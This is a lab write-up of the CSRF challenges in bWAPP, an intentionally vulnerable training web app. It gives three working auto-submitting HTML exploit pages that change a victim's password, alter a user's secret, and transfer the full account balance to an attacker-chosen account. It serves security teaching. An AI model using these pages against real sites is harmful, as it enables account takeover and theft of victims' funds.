BWAPP CSRF Challenges Solutions | Cross Site Request Forgery

bWAPP, or a buggy web application, is a free and open source PHP based web application for Practising Web Pentesting and learn about web vulnerabilities in a safe environment. Its main goal is to provide a safe and legal environment for security professionals and students to test their skills and tools and learn about Web security. Now to install bWapp on your system please visit the below link :

        http://www.sec-art.net/2018/06/how-to-install-bwapp-buggy-web-app-web.html

In this post we will go through all the CSRF ( Cross Site Request Forgery) Vulnerabilities on the bWAPP application.

For some basics information about CSRF vulnerability please visit the link : Introduction to CSRF

And the exploit code used below can be found at here : Github_Repo

 Now lets start with the first CSRF challenges.


The first challenge is "Change Password", where we need makes the victim to change the password with our CSRF attack page. The exploit code is :

ch1.html
<!-- exploit for Challenge 1 : CSRF vulnerability BWAPP -->
<html>
  <body onload="document.getElementById('xsrf').submit();">
    <form id="xsrf" method="GET" action="http://192.168.56.102/BWAPP/csrf_1.php">
      <input name="password_new" type="hidden" value="hacked">
      <input name="password_conf" type="hidden" value="hacked">
      <input name="action" type="hidden" value="Change">
    </form>
  </body>
</html>
As we can see the above code will submit the get form automatically, when the page is opened by the victim, and the password has been successfully changed.


In the second challenge we have to change the users's secret. For this our exploit code is :

ch2.html
<!-- Exploit for challenge 2 : CSRF vulnerability BWAPP -->
<html>
  <body onload="document.getElementById('xsrf').submit()">
    <form id="xsrf" method="POST" action="http://192.168.56.102/BWAPP/csrf_3.php">
      <input type="hidden" name="secret" value="You have been hacked">
      <input type="hidden" name="login" value="bee">
      <input type="hidden" name="action" value="change">
    </form>
  </body>
</html>
The above code will submit the post form automatically, when the page is opened by the victim, and the user's secret has been successfully changed.


In the third challenge, their is a "Transfer Amount" page, where we can transfer funds on different account from the account, and currently our account balance is 1000 euro. Now for example, we can transfer 100 dollar to account number 123-45678-90.


Now art this point we can make a CSRF page which transfer all the money to our given address. So the code for it is :

ch3.html
<!-- exploit for Challenge 3 : CSRF vulnerability BWAPP -->
<html>
  <body onload="document.getElementById('xsrf').submit();">
    <form id="xsrf" method="GET" action="http://192.168.56.102/BWAPP/csrf_2.php">
      <input name="account" type="hidden" value="999-9999-999">
      <input name="amount" type="hidden" value="1000">
      <input name="action" type="hidden" value="transfer">
    </form>
  </body>
</html>

When the victims opens the above page, then all the 1000 euro will be transferred onto the account number 999-9999-99.



And now as wee can see the account balance is 0 euro.

Conclusion :

So that's it about the CSRF chellanges in bWAPP. For more web security related stuff :

http://www.sec-art.net/p/web-security.html